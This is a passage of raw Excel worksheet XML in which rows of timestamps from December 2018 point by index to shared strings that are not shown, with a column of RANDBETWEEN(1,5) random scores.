      <c r="E6329" s="2" t="s">
        <v>5652</v>
      </c>
      <c r="F6329">
        <f t="shared" ca="1" si="98"/>
        <v>5</v>
      </c>
    </row>
    <row r="6330" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6330" s="1">
        <v>43439.374548611115</v>
      </c>
      <c r="C6330" t="s">
        <v>60</v>
      </c>
      <c r="D6330" t="s">
        <v>312</v>
      </c>
      <c r="E6330" t="s">
        <v>5653</v>
      </c>
      <c r="F6330">
        <f t="shared" ca="1" si="98"/>
        <v>4</v>
      </c>
    </row>
    <row r="6331" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6331" s="1">
        <v>43439.372604166667</v>
      </c>
      <c r="C6331" t="s">
        <v>10</v>
      </c>
      <c r="D6331" t="s">
        <v>20</v>
      </c>
      <c r="E6331" t="s">
        <v>5654</v>
      </c>
      <c r="F6331">
        <f t="shared" ca="1" si="98"/>
        <v>1</v>
      </c>
    </row>
    <row r="6332" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A6332" s="1">
        <v>43439.353912037041</v>
      </c>
      <c r="C6332" t="s">
        <v>71</v>
      </c>
      <c r="E6332" s="2" t="s">
        <v>5655</v>
      </c>
      <c r="F6332">
        <f t="shared" ca="1" si="98"/>
        <v>4</v>
      </c>
    </row>
    <row r="6333" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A6333" s="1">
        <v>43439.343402777777</v>
      </c>
      <c r="C6333" t="s">
        <v>48</v>
      </c>
      <c r="E6333" s="2" t="s">
        <v>5656</v>
      </c>
      <c r="F6333">
        <f t="shared" ca="1" si="98"/>
        <v>2</v>
      </c>
    </row>
    <row r="6334" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A6334" s="1">
        <v>43439.338865740741</v>
      </c>
      <c r="C6334" t="s">
        <v>71</v>
      </c>
      <c r="D6334" t="s">
        <v>112</v>
      </c>
      <c r="E6334" s="2" t="s">
        <v>3970</v>
      </c>
      <c r="F6334">
        <f t="shared" ca="1" si="98"/>
        <v>5</v>
      </c>
    </row>
    <row r="6335" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A6335" s="1">
        <v>43439.27983796296</v>
      </c>
      <c r="C6335" t="s">
        <v>318</v>
      </c>
      <c r="E6335" s="2" t="s">
        <v>5657</v>
      </c>
      <c r="F6335">
        <f t="shared" ca="1" si="98"/>
        <v>1</v>
      </c>
    </row>
    <row r="6336" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A6336" s="1">
        <v>43439.270497685182</v>
      </c>
      <c r="C6336" t="s">
        <v>71</v>
      </c>
      <c r="E6336" s="2" t="s">
        <v>5658</v>
      </c>
      <c r="F6336">
        <f t="shared" ca="1" si="98"/>
        <v>3</v>
      </c>
    </row>
    <row r="6337" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6337" s="1">
        <v>43439.261342592596</v>
      </c>
      <c r="C6337" t="s">
        <v>60</v>
      </c>
      <c r="F6337">
        <f t="shared" ca="1" si="98"/>
        <v>4</v>
      </c>
    </row>
    <row r="6338" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6338" s="1">
        <v>43439.253946759258</v>
      </c>
      <c r="C6338" t="s">
        <v>686</v>
      </c>
      <c r="E6338" t="s">
        <v>5659</v>
      </c>
      <c r="F6338">
        <f t="shared" ref="F6338:F6401" ca="1" si="99">RANDBETWEEN(1,5)</f>
        <v>5</v>
      </c>
    </row>
    <row r="6339" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A6339" s="1">
        <v>43439.248182870368</v>
      </c>
      <c r="C6339" t="s">
        <v>3515</v>
      </c>
      <c r="E6339" s="2" t="s">
        <v>5660</v>
      </c>
      <c r="F6339">
        <f t="shared" ca="1" si="99"/>
        <v>3</v>
      </c>
    </row>
    <row r="6340" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6340" s="1">
        <v>43439.233287037037</v>
      </c>
      <c r="C6340" t="s">
        <v>41</v>
      </c>
      <c r="E6340" t="s">
        <v>5661</v>
      </c>
      <c r="F6340">
        <f t="shared" ca="1" si="99"/>
        <v>2</v>
      </c>
    </row>
    <row r="6341" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A6341" s="1">
        <v>43439.212870370371</v>
      </c>
      <c r="C6341" t="s">
        <v>10</v>
      </c>
      <c r="D6341" t="s">
        <v>713</v>
      </c>
      <c r="E6341" s="2" t="s">
        <v>5662</v>
      </c>
      <c r="F6341">
        <f t="shared" ca="1" si="99"/>
        <v>2</v>
      </c>
    </row>
    <row r="6342" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6342" s="1">
        <v>43439.210196759261</v>
      </c>
      <c r="C6342" t="s">
        <v>60</v>
      </c>
      <c r="E6342" t="s">
        <v>5663</v>
      </c>
      <c r="F6342">
        <f t="shared" ca="1" si="99"/>
        <v>5</v>
      </c>
    </row>
    <row r="6343" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6343" s="1">
        <v>43439.196979166663</v>
      </c>
      <c r="C6343" t="s">
        <v>48</v>
      </c>
      <c r="E6343" t="s">
        <v>5664</v>
      </c>
      <c r="F6343">
        <f t="shared" ca="1" si="99"/>
        <v>3</v>
      </c>
    </row>
    <row r="6344" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6344" s="1">
        <v>43439.18608796296</v>
      </c>
      <c r="C6344" t="s">
        <v>41</v>
      </c>
      <c r="D6344" t="s">
        <v>312</v>
      </c>
      <c r="E6344" t="s">
        <v>5665</v>
      </c>
      <c r="F6344">
        <f t="shared" ca="1" si="99"/>
        <v>5</v>
      </c>
    </row>
    <row r="6345" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A6345" s="1">
        <v>43439.180324074077</v>
      </c>
      <c r="C6345" t="s">
        <v>71</v>
      </c>
      <c r="D6345" t="s">
        <v>312</v>
      </c>
      <c r="E6345" s="2" t="s">
        <v>5666</v>
      </c>
      <c r="F6345">
        <f t="shared" ca="1" si="99"/>
        <v>1</v>
      </c>
    </row>
    <row r="6346" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6346" s="1">
        <v>43439.158009259256</v>
      </c>
      <c r="C6346" t="s">
        <v>140</v>
      </c>
      <c r="D6346" t="s">
        <v>141</v>
      </c>
      <c r="E6346" t="s">
        <v>5667</v>
      </c>
      <c r="F6346">
        <f t="shared" ca="1" si="99"/>
        <v>2</v>
      </c>
    </row>
    <row r="6347" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6347" s="1">
        <v>43439.138495370367</v>
      </c>
      <c r="C6347" t="s">
        <v>50</v>
      </c>
      <c r="E6347" t="s">
        <v>5668</v>
      </c>
      <c r="F6347">
        <f t="shared" ca="1" si="99"/>
        <v>3</v>
      </c>
    </row>
    <row r="6348" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6348" s="1">
        <v>43439.10800925926</v>
      </c>
      <c r="C6348" t="s">
        <v>10</v>
      </c>
      <c r="D6348" t="s">
        <v>163</v>
      </c>
      <c r="F6348">
        <f t="shared" ca="1" si="99"/>
        <v>2</v>
      </c>
    </row>
    <row r="6349" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6349" s="1">
        <v>43439.056458333333</v>
      </c>
      <c r="C6349" t="s">
        <v>318</v>
      </c>
      <c r="E6349" t="s">
        <v>5669</v>
      </c>
      <c r="F6349">
        <f t="shared" ca="1" si="99"/>
        <v>3</v>
      </c>
    </row>
    <row r="6350" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6350" s="1">
        <v>43438.933530092596</v>
      </c>
      <c r="C6350" t="s">
        <v>10</v>
      </c>
      <c r="D6350" t="s">
        <v>33</v>
      </c>
      <c r="F6350">
        <f t="shared" ca="1" si="99"/>
        <v>3</v>
      </c>
    </row>
    <row r="6351" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6351" s="1">
        <v>43438.927442129629</v>
      </c>
      <c r="C6351" t="s">
        <v>10</v>
      </c>
      <c r="D6351" t="s">
        <v>33</v>
      </c>
      <c r="F6351">
        <f t="shared" ca="1" si="99"/>
        <v>5</v>
      </c>
    </row>
    <row r="6352" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6352" s="1">
        <v>43438.785787037035</v>
      </c>
      <c r="C6352" t="s">
        <v>10</v>
      </c>
      <c r="D6352" t="s">
        <v>6</v>
      </c>
      <c r="E6352" t="s">
        <v>5670</v>
      </c>
      <c r="F6352">
        <f t="shared" ca="1" si="99"/>
        <v>3</v>
      </c>
    </row>
    <row r="6353" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6353" s="1">
        <v>43438.784467592595</v>
      </c>
      <c r="C6353" t="s">
        <v>6</v>
      </c>
      <c r="D6353" t="s">
        <v>821</v>
      </c>
      <c r="E6353" t="s">
        <v>5671</v>
      </c>
      <c r="F6353">
        <f t="shared" ca="1" si="99"/>
        <v>4</v>
      </c>
    </row>
    <row r="6354" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6354" s="1">
        <v>43438.708472222221</v>
      </c>
      <c r="C6354" t="s">
        <v>10</v>
      </c>
      <c r="D6354" t="s">
        <v>112</v>
      </c>
      <c r="E6354" t="s">
        <v>5672</v>
      </c>
      <c r="F6354">
        <f t="shared" ca="1" si="99"/>
        <v>2</v>
      </c>
    </row>
    <row r="6355" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6355" s="1">
        <v>43438.665613425925</v>
      </c>
      <c r="C6355" t="s">
        <v>10</v>
      </c>
      <c r="D6355" t="s">
        <v>178</v>
      </c>
      <c r="E6355" t="s">
        <v>5673</v>
      </c>
      <c r="F6355">
        <f t="shared" ca="1" si="99"/>
        <v>5</v>
      </c>
    </row>
    <row r="6356" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6356" s="1">
        <v>43438.655729166669</v>
      </c>
      <c r="C6356" t="s">
        <v>10</v>
      </c>
      <c r="D6356" t="s">
        <v>23</v>
      </c>
      <c r="E6356" t="s">
        <v>5674</v>
      </c>
      <c r="F6356">
        <f t="shared" ca="1" si="99"/>
        <v>5</v>
      </c>
    </row>
    <row r="6357" spans="1:6" ht="360" x14ac:dyDescent="0.25">
      <c r="A6357" s="1">
        <v>43438.641134259262</v>
      </c>
      <c r="C6357" t="s">
        <v>71</v>
      </c>
      <c r="E6357" s="2" t="s">
        <v>5675</v>
      </c>
      <c r="F6357">
        <f t="shared" ca="1" si="99"/>
        <v>5</v>
      </c>
    </row>
    <row r="6358" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6358" s="1">
        <v>43438.637372685182</v>
      </c>
      <c r="C6358" t="s">
        <v>10</v>
      </c>
      <c r="D6358" t="s">
        <v>33</v>
      </c>
      <c r="F6358">
        <f t="shared" ca="1" si="99"/>
        <v>1</v>
      </c>
    </row>
    <row r="6359" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A6359" s="1">
        <v>43438.62295138889</v>
      </c>
      <c r="C6359" t="s">
        <v>721</v>
      </c>
      <c r="E6359" s="2" t="s">
        <v>5676</v>
      </c>
      <c r="F6359">
        <f t="shared" ca="1" si="99"/>
        <v>3</v>
      </c>
    </row>
    <row r="6360" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6360" s="1">
        <v>43438.622685185182</v>
      </c>
      <c r="C6360" t="s">
        <v>10</v>
      </c>
      <c r="D6360" t="s">
        <v>52</v>
      </c>
      <c r="E6360" t="s">
        <v>5677</v>
      </c>
      <c r="F6360">
        <f t="shared" ca="1" si="99"/>
        <v>3</v>
      </c>
    </row>
    <row r="6361" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6361" s="1">
        <v>43438.61954861111</v>
      </c>
      <c r="C6361" t="s">
        <v>10</v>
      </c>
      <c r="D6361" t="s">
        <v>290</v>
      </c>
      <c r="E6361" t="s">
        <v>5678</v>
      </c>
      <c r="F6361">
        <f t="shared" ca="1" si="99"/>
        <v>2</v>
      </c>
    </row>
    <row r="6362" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6362" s="1">
        <v>43438.616828703707</v>
      </c>
      <c r="C6362" t="s">
        <v>10</v>
      </c>
      <c r="D6362" t="s">
        <v>80</v>
      </c>
      <c r="E6362" t="s">
        <v>5679</v>
      </c>
      <c r="F6362">
        <f t="shared" ca="1" si="99"/>
        <v>5</v>
      </c>
    </row>
    <row r="6363" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6363" s="1">
        <v>43438.606157407405</v>
      </c>
      <c r="C6363" t="s">
        <v>60</v>
      </c>
      <c r="E6363" t="s">
        <v>5680</v>
      </c>
      <c r="F6363">
        <f t="shared" ca="1" si="99"/>
        <v>1</v>
      </c>
    </row>
    <row r="6364" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6364" s="1">
        <v>43438.57199074074</v>
      </c>
      <c r="C6364" t="s">
        <v>290</v>
      </c>
      <c r="E6364" t="s">
        <v>5681</v>
      </c>
      <c r="F6364">
        <f t="shared" ca="1" si="99"/>
        <v>3</v>
      </c>
    </row>
    <row r="6365" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6365" s="1">
        <v>43438.528090277781</v>
      </c>
      <c r="C6365" t="s">
        <v>10</v>
      </c>
      <c r="D6365" t="s">
        <v>244</v>
      </c>
      <c r="E6365" t="s">
        <v>5682</v>
      </c>
      <c r="F6365">
        <f t="shared" ca="1" si="99"/>
        <v>4</v>
      </c>
    </row>
    <row r="6366" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6366" s="1">
        <v>43438.521828703706</v>
      </c>
      <c r="C6366" t="s">
        <v>16</v>
      </c>
      <c r="E6366" t="s">
        <v>5683</v>
      </c>
      <c r="F6366">
        <f t="shared" ca="1" si="99"/>
        <v>2</v>
      </c>
    </row>
    <row r="6367" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6367" s="1">
        <v>43438.511597222219</v>
      </c>
      <c r="C6367" t="s">
        <v>60</v>
      </c>
      <c r="E6367" t="s">
        <v>5684</v>
      </c>
      <c r="F6367">
        <f t="shared" ca="1" si="99"/>
        <v>5</v>
      </c>
    </row>
    <row r="6368" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A6368" s="1">
        <v>43438.501782407409</v>
      </c>
      <c r="C6368" t="s">
        <v>10</v>
      </c>
      <c r="D6368" t="s">
        <v>52</v>
      </c>
      <c r="E6368" s="2" t="s">
        <v>5685</v>
      </c>
      <c r="F6368">
        <f t="shared" ca="1" si="99"/>
        <v>3</v>
      </c>
    </row>
    <row r="6369" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A6369" s="1">
        <v>43438.499895833331</v>
      </c>
      <c r="C6369" t="s">
        <v>10</v>
      </c>
      <c r="D6369" t="s">
        <v>89</v>
      </c>
      <c r="E6369" s="2" t="s">
        <v>5686</v>
      </c>
      <c r="F6369">
        <f t="shared" ca="1" si="99"/>
        <v>3</v>
      </c>
    </row>
    <row r="6370" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A6370" s="1">
        <v>43438.499884259261</v>
      </c>
      <c r="C6370" t="s">
        <v>10</v>
      </c>
      <c r="D6370" t="s">
        <v>89</v>
      </c>
      <c r="E6370" s="2" t="s">
        <v>5686</v>
      </c>
      <c r="F6370">
        <f t="shared" ca="1" si="99"/>
        <v>2</v>
      </c>
    </row>
    <row r="6371" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A6371" s="1">
        <v>43438.499861111108</v>
      </c>
      <c r="C6371" t="s">
        <v>10</v>
      </c>
      <c r="D6371" t="s">
        <v>89</v>
      </c>
      <c r="E6371" s="2" t="s">
        <v>5686</v>
      </c>
      <c r="F6371">
        <f t="shared" ca="1" si="99"/>
        <v>2</v>
      </c>
    </row>
    <row r="6372" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A6372" s="1">
        <v>43438.499768518515</v>
      </c>
      <c r="C6372" t="s">
        <v>10</v>
      </c>
      <c r="D6372" t="s">
        <v>89</v>
      </c>
      <c r="E6372" s="2" t="s">
        <v>5686</v>
      </c>
      <c r="F6372">
        <f t="shared" ca="1" si="99"/>
        <v>2</v>
      </c>
    </row>
    <row r="6373" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A6373" s="1">
        <v>43438.499699074076</v>
      </c>
      <c r="C6373" t="s">
        <v>10</v>
      </c>
      <c r="D6373" t="s">
        <v>89</v>
      </c>
      <c r="E6373" s="2" t="s">
        <v>5686</v>
      </c>
      <c r="F6373">
        <f t="shared" ca="1" si="99"/>
        <v>4</v>
      </c>
    </row>
    <row r="6374" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A6374" s="1">
        <v>43438.499652777777</v>
      </c>
      <c r="C6374" t="s">
        <v>10</v>
      </c>
      <c r="D6374" t="s">
        <v>89</v>
      </c>
      <c r="E6374" s="2" t="s">
        <v>5686</v>
      </c>
      <c r="F6374">
        <f t="shared" ca="1" si="99"/>
        <v>1</v>
      </c>
    </row>
    <row r="6375" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A6375" s="1">
        <v>43438.49013888889</v>
      </c>
      <c r="C6375" t="s">
        <v>10</v>
      </c>
      <c r="D6375" t="s">
        <v>89</v>
      </c>
      <c r="E6375" s="2" t="s">
        <v>5687</v>
      </c>
      <c r="F6375">
        <f t="shared" ca="1" si="99"/>
        <v>4</v>
      </c>
    </row>
    <row r="6376" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6376" s="1">
        <v>43438.473935185182</v>
      </c>
      <c r="C6376" t="s">
        <v>10</v>
      </c>
      <c r="D6376" t="s">
        <v>89</v>
      </c>
      <c r="E6376" t="s">
        <v>5688</v>
      </c>
      <c r="F6376">
        <f t="shared" ca="1" si="99"/>
        <v>5</v>
      </c>
    </row>
    <row r="6377" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6377" s="1">
        <v>43438.468923611108</v>
      </c>
      <c r="C6377" t="s">
        <v>60</v>
      </c>
      <c r="E6377" t="s">
        <v>5689</v>
      </c>
      <c r="F6377">
        <f t="shared" ca="1" si="99"/>
        <v>1</v>
      </c>
    </row>
    <row r="6378" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6378" s="1">
        <v>43438.465104166666</v>
      </c>
      <c r="C6378" t="s">
        <v>6</v>
      </c>
      <c r="D6378" t="s">
        <v>114</v>
      </c>
      <c r="E6378" t="s">
        <v>5690</v>
      </c>
      <c r="F6378">
        <f t="shared" ca="1" si="99"/>
        <v>3</v>
      </c>
    </row>
    <row r="6379" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6379" s="1">
        <v>43438.462557870371</v>
      </c>
      <c r="C6379" t="s">
        <v>10</v>
      </c>
      <c r="D6379" t="s">
        <v>107</v>
      </c>
      <c r="E6379" t="s">
        <v>5691</v>
      </c>
      <c r="F6379">
        <f t="shared" ca="1" si="99"/>
        <v>4</v>
      </c>
    </row>
    <row r="6380" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6380" s="1">
        <v>43438.458402777775</v>
      </c>
      <c r="C6380" t="s">
        <v>10</v>
      </c>
      <c r="D6380" t="s">
        <v>158</v>
      </c>
      <c r="E6380" t="s">
        <v>5692</v>
      </c>
      <c r="F6380">
        <f t="shared" ca="1" si="99"/>
        <v>4</v>
      </c>
    </row>
    <row r="6381" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A6381" s="1">
        <v>43438.457280092596</v>
      </c>
      <c r="C6381" t="s">
        <v>50</v>
      </c>
      <c r="E6381" s="2" t="s">
        <v>5693</v>
      </c>
      <c r="F6381">
        <f t="shared" ca="1" si="99"/>
        <v>5</v>
      </c>
    </row>
    <row r="6382" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6382" s="1">
        <v>43438.43005787037</v>
      </c>
      <c r="C6382" t="s">
        <v>253</v>
      </c>
      <c r="D6382" t="s">
        <v>312</v>
      </c>
      <c r="E6382" t="s">
        <v>5694</v>
      </c>
      <c r="F6382">
        <f t="shared" ca="1" si="99"/>
        <v>5</v>
      </c>
    </row>
    <row r="6383" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A6383" s="1">
        <v>43438.426886574074</v>
      </c>
      <c r="C6383" t="s">
        <v>6</v>
      </c>
      <c r="D6383" t="s">
        <v>82</v>
      </c>
      <c r="E6383" s="2" t="s">
        <v>5695</v>
      </c>
      <c r="F6383">
        <f t="shared" ca="1" si="99"/>
        <v>2</v>
      </c>
    </row>
    <row r="6384" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A6384" s="1">
        <v>43438.397592592592</v>
      </c>
      <c r="C6384" t="s">
        <v>178</v>
      </c>
      <c r="E6384" s="2" t="s">
        <v>5696</v>
      </c>
      <c r="F6384">
        <f t="shared" ca="1" si="99"/>
        <v>2</v>
      </c>
    </row>
    <row r="6385" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6385" s="1">
        <v>43438.39398148148</v>
      </c>
      <c r="C6385" t="s">
        <v>6</v>
      </c>
      <c r="D6385" t="s">
        <v>602</v>
      </c>
      <c r="E6385" t="s">
        <v>5697</v>
      </c>
      <c r="F6385">
        <f t="shared" ca="1" si="99"/>
        <v>2</v>
      </c>
    </row>
    <row r="6386" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6386" s="1">
        <v>43438.391655092593</v>
      </c>
      <c r="C6386" t="s">
        <v>60</v>
      </c>
      <c r="E6386" t="s">
        <v>5698</v>
      </c>
      <c r="F6386">
        <f t="shared" ca="1" si="99"/>
        <v>4</v>
      </c>
    </row>
    <row r="6387" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6387" s="1">
        <v>43438.391388888886</v>
      </c>
      <c r="C6387" t="s">
        <v>10</v>
      </c>
      <c r="D6387" t="s">
        <v>192</v>
      </c>
      <c r="E6387" t="s">
        <v>5699</v>
      </c>
      <c r="F6387">
        <f t="shared" ca="1" si="99"/>
        <v>1</v>
      </c>
    </row>
    <row r="6388" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6388" s="1">
        <v>43438.390555555554</v>
      </c>
      <c r="C6388" t="s">
        <v>60</v>
      </c>
      <c r="F6388">
        <f t="shared" ca="1" si="99"/>
        <v>5</v>
      </c>
    </row>
    <row r="6389" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6389" s="1">
        <v>43438.388819444444</v>
      </c>
      <c r="C6389" t="s">
        <v>10</v>
      </c>
      <c r="D6389" t="s">
        <v>36</v>
      </c>
      <c r="E6389" t="s">
        <v>5700</v>
      </c>
      <c r="F6389">
        <f t="shared" ca="1" si="99"/>
        <v>4</v>
      </c>
    </row>
    <row r="6390" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6390" s="1">
        <v>43438.383831018517</v>
      </c>
      <c r="C6390" t="s">
        <v>10</v>
      </c>
      <c r="D6390" t="s">
        <v>36</v>
      </c>
      <c r="E6390" t="s">
        <v>5701</v>
      </c>
      <c r="F6390">
        <f t="shared" ca="1" si="99"/>
        <v>2</v>
      </c>
    </row>
    <row r="6391" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A6391" s="1">
        <v>43438.339375000003</v>
      </c>
      <c r="C6391" t="s">
        <v>124</v>
      </c>
      <c r="E6391" s="2" t="s">
        <v>5702</v>
      </c>
      <c r="F6391">
        <f t="shared" ca="1" si="99"/>
        <v>4</v>
      </c>
    </row>
    <row r="6392" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A6392" s="1">
        <v>43438.319560185184</v>
      </c>
      <c r="C6392" t="s">
        <v>454</v>
      </c>
      <c r="E6392" s="2" t="s">
        <v>5703</v>
      </c>
      <c r="F6392">
        <f t="shared" ca="1" si="99"/>
        <v>1</v>
      </c>
    </row>
    <row r="6393" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A6393" s="1">
        <v>43438.314016203702</v>
      </c>
      <c r="C6393" t="s">
        <v>43</v>
      </c>
      <c r="E6393" s="2" t="s">
        <v>5704</v>
      </c>
      <c r="F6393">
        <f t="shared" ca="1" si="99"/>
        <v>1</v>
      </c>
    </row>
    <row r="6394" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A6394" s="1">
        <v>43438.309687499997</v>
      </c>
      <c r="C6394" t="s">
        <v>41</v>
      </c>
      <c r="E6394" s="2" t="s">
        <v>5705</v>
      </c>
      <c r="F6394">
        <f t="shared" ca="1" si="99"/>
        <v>4</v>
      </c>
    </row>
    <row r="6395" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6395" s="1">
        <v>43438.282546296294</v>
      </c>
      <c r="C6395" t="s">
        <v>454</v>
      </c>
      <c r="E6395" t="s">
        <v>5706</v>
      </c>
      <c r="F6395">
        <f t="shared" ca="1" si="99"/>
        <v>1</v>
      </c>
    </row>
    <row r="6396" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A6396" s="1">
        <v>43438.273599537039</v>
      </c>
      <c r="C6396" t="s">
        <v>1931</v>
      </c>
      <c r="E6396" s="2" t="s">
        <v>5707</v>
      </c>
      <c r="F6396">
        <f t="shared" ca="1" si="99"/>
        <v>4</v>
      </c>
    </row>
    <row r="6397" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6397" s="1">
        <v>43438.27002314815</v>
      </c>
      <c r="C6397" t="s">
        <v>2082</v>
      </c>
      <c r="E6397" t="s">
        <v>5708</v>
      </c>
      <c r="F6397">
        <f t="shared" ca="1" si="99"/>
        <v>3</v>
      </c>
    </row>
    <row r="6398" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6398" s="1">
        <v>43438.268460648149</v>
      </c>
      <c r="C6398" t="s">
        <v>3515</v>
      </c>
      <c r="D6398" t="s">
        <v>1056</v>
      </c>
      <c r="E6398" t="s">
        <v>3815</v>
      </c>
      <c r="F6398">
        <f t="shared" ca="1" si="99"/>
        <v>3</v>
      </c>
    </row>
    <row r="6399" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A6399" s="1">
        <v>43438.246331018519</v>
      </c>
      <c r="C6399" t="s">
        <v>48</v>
      </c>
      <c r="E6399" s="2" t="s">
        <v>5709</v>
      </c>
      <c r="F6399">
        <f t="shared" ca="1" si="99"/>
        <v>5</v>
      </c>
    </row>
    <row r="6400" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A6400" s="1">
        <v>43438.223495370374</v>
      </c>
      <c r="C6400" t="s">
        <v>461</v>
      </c>
      <c r="E6400" s="2" t="s">
        <v>5710</v>
      </c>
      <c r="F6400">
        <f t="shared" ca="1" si="99"/>
        <v>2</v>
      </c>
    </row>
    <row r="6401" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A6401" s="1">
        <v>43438.172210648147</v>
      </c>
      <c r="C6401" t="s">
        <v>73</v>
      </c>
      <c r="E6401" s="2" t="s">
        <v>5711</v>
      </c>
      <c r="F6401">
        <f t="shared" ca="1" si="99"/>
        <v>5</v>
      </c>
    </row>
    <row r="6402" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6402" s="1">
        <v>43438.150289351855</v>
      </c>
      <c r="C6402" t="s">
        <v>253</v>
      </c>
      <c r="E6402" t="s">
        <v>5712</v>
      </c>
      <c r="F6402">
        <f t="shared" ref="F6402:F6465" ca="1" si="100">RANDBETWEEN(1,5)</f>
        <v>3</v>
      </c>
    </row>
    <row r="6403" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6403" s="1">
        <v>43438.142870370371</v>
      </c>
      <c r="C6403" t="s">
        <v>173</v>
      </c>
      <c r="E6403" t="s">
        <v>5713</v>
      </c>
      <c r="F6403">
        <f t="shared" ca="1" si="100"/>
        <v>1</v>
      </c>
    </row>
    <row r="6404" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6404" s="1">
        <v>43438.127372685187</v>
      </c>
      <c r="C6404" t="s">
        <v>2545</v>
      </c>
      <c r="E6404" t="s">
        <v>5714</v>
      </c>
      <c r="F6404">
        <f t="shared" ca="1" si="100"/>
        <v>1</v>
      </c>
    </row>
    <row r="6405" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A6405" s="1">
        <v>43438.116168981483</v>
      </c>
      <c r="C6405" t="s">
        <v>144</v>
      </c>
      <c r="E6405" s="2" t="s">
        <v>5715</v>
      </c>
      <c r="F6405">
        <f t="shared" ca="1" si="100"/>
        <v>4</v>
      </c>
    </row>
    <row r="6406" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6406" s="1">
        <v>43438.109988425924</v>
      </c>
      <c r="C6406" t="s">
        <v>41</v>
      </c>
      <c r="E6406" t="s">
        <v>5716</v>
      </c>
      <c r="F6406">
        <f t="shared" ca="1" si="100"/>
        <v>5</v>
      </c>
    </row>
    <row r="6407" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A6407" s="1">
        <v>43438.108946759261</v>
      </c>
      <c r="C6407" t="s">
        <v>1080</v>
      </c>
      <c r="E6407" s="2" t="s">
        <v>5717</v>
      </c>
      <c r="F6407">
        <f t="shared" ca="1" si="100"/>
        <v>3</v>
      </c>
    </row>
    <row r="6408" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6408" s="1">
        <v>43438.099224537036</v>
      </c>
      <c r="C6408" t="s">
        <v>1325</v>
      </c>
      <c r="D6408" t="s">
        <v>271</v>
      </c>
      <c r="E6408" t="s">
        <v>5234</v>
      </c>
      <c r="F6408">
        <f t="shared" ca="1" si="100"/>
        <v>1</v>
      </c>
    </row>
    <row r="6409" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6409" s="1">
        <v>43438.008206018516</v>
      </c>
      <c r="C6409" t="s">
        <v>144</v>
      </c>
      <c r="D6409" t="s">
        <v>312</v>
      </c>
